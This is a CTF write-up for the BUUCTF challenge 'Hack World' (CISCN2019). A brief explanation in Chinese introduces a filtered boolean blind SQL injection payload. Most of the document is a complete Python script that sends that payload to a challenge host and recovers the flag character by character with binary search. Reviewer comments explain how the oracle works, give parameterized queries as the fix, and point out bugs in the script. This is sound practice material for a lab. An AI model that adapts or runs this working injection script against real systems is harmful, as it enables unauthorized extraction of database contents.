buuctf-web-[CISCN2019 华北赛区 Day2 Web1]Hack World

一个盲注过滤了很多东西
最后发现这样可以正常回显
id=1^(if((ascii(substr((select(flag)from(flag)),1,1))=102),0,1))
写脚本一位位爆破,二分法找

#!/usr/bin/python
#-*-coding:utf-8 -*-
import requests
import re

def flag_get(start: int, f: int, url: str) -> int:    # check the character at position start
	"""Return 1 if the flag character at 1-based position ``start`` has ASCII code ``f``, else 0.

	This is one oracle query of a boolean-based blind SQL injection: the
	injected ``id`` value is ``1^(if(<cond>,0,1))``, so the server evaluates
	``1^0 = 1`` (the normal "Hello" page) when the condition holds and
	``1^1 = 0`` (a different page) when it does not. The presence of the
	literal ``Hello`` in the response body is the only signal read back.

	Args:
		start: 1-based character index into the flag value.
		f: ASCII code to compare against.
		url: ignored — see NOTE(review) below.

	Returns:
		1 when the response contains ``Hello`` (condition true), otherwise 0.

	NOTE(review): the ``url`` parameter is shadowed by the hard-coded
	assignment below, so the caller's value is never used. The server-side
	cause of this oracle is string-built SQL on the ``id`` parameter; a
	parameterized query (and a response that does not vary with the
	injected condition) removes the channel entirely.
	"""
	a='1^(if((ascii(substr((select(flag)from(flag)),'+str(start)+',1))='+str(f)+'),0,1))'
	data = {'id': a }
	url = 'http://76333ea2-9071-468b-ad3c-930e98a4ead2.node1.buuoj.cn/index.php'  # overrides the url argument
	r= requests.post(url, data)
	s=r.text
	#print(s)
	if 'Hello' in s:
		return 1
	else:
		return 0

def flag_find(start: int, f: int, url: str) -> int: # check
	"""Return 1 if the flag character at 1-based position ``start`` has ASCII code greater than ``f``, else 0.

	Same oracle as :func:`flag_get`, but the injected condition is ``> f``
	instead of ``= f``; the main loop uses it to binary-search the ASCII
	range before falling back to an equality scan.

	Args:
		start: 1-based character index into the flag value.
		f: ASCII code used as the comparison threshold.
		url: ignored — see NOTE(review) below.

	Returns:
		1 when the response contains ``Hello`` (condition true), otherwise 0.

	NOTE(review): ``url`` is shadowed by the hard-coded assignment below,
	exactly as in ``flag_get``; the two functions differ only in the
	comparison operator inside the payload and could share one helper.
	"""
	a='1^(if((ascii(substr((select(flag)from(flag)),'+str(start)+',1))>'+str(f)+'),0,1))'
	data = {'id': a }
	url = 'http://76333ea2-9071-468b-ad3c-930e98a4ead2.node1.buuoj.cn/index.php'  # overrides the url argument
	r= requests.post(url, data)
	s=r.text
	#print(s)
	if 'Hello' in s:
		return 1
	else:
		return 0



if __name__ == '__main__':
	# Driver: recovers the flag one character at a time. For each position it
	# narrows the printable-ASCII range with flag_find (">" oracle) until the
	# window is smaller than 5, then confirms the exact character with
	# flag_get ("=" oracle). Every oracle call is one HTTP POST, so the
	# request volume per character is roughly log2(94) + up to 5 — a
	# burst of near-identical POSTs to index.php that differ only in the
	# numeric literals of the ``id`` payload, which is what a WAF or
	# access-log review would see.
	url = 'http://76333ea2-9071-468b-ad3c-930e98a4ead2.node1.buuoj.cn/index.php'  # passed through but shadowed inside both helpers
	flag_kouhao=125  # ASCII code of '}' — the closing brace that ends the flag
	flag=''
	num=1       # start brute-forcing from position num
	while 1:
		start=32   # lower bound of the ascii range (decimal)
		last=126   # upper bound of the ascii range (decimal)
		mid=int((start+last)/2)
		while 1:
			# Termination check first: if this position is '}', the flag is
			# complete. exit(1) is the only way out of the outer loop, so the
			# final print(flag) below is never reached (the printout here
			# is the real result). NOTE(review): exit(1) reports a failure
			# status to the shell even though this is the success path.
			if(flag_get(num,flag_kouhao,url)):
				flag=flag+'}'
				print('flag     is    :'+flag)
				exit(1)
			print('strat is '+str(start))
			print(' mid  is '+str(mid))
			print('last  is '+str(last))
			print('****************************************')

			# Binary search on the ">" oracle. When the char is > mid the lower
			# bound moves up to mid (not mid+1, so the window always still
			# contains the answer); otherwise the upper bound moves down.
			# Stop once the window is narrower than 5 and finish linearly.
			if(flag_find(num,mid,url)):
				start=mid
				mid=int((start+last)/2)
				if ((last-start)<5):
					break
			else:
				last=mid
				mid=int((start+last)/2)
				if ((last-start)<5):
					break
		print(start)
		print(last)
		print('****************************************')
		# Linear confirmation over the remaining window with the "=" oracle.
		# If no value in [start, last] matches (e.g. a transient HTTP error
		# made an oracle call return 0), nothing is appended and the loop
		# silently moves on to the next position — the recovered flag would
		# then be missing a character.
		for i in range(start,last+1):
			print(i)
			if(flag_get(num,i,url)):
				f=chr(i)
				flag=flag+f
				print('****************************************')
				print(' num is '+str(num))
				print('char is '+f)
				print('flag is '+flag)
				print('****************************************')
				break
		num=num+1	
	print(flag)  # unreachable: the outer while 1 only ends via exit(1) above
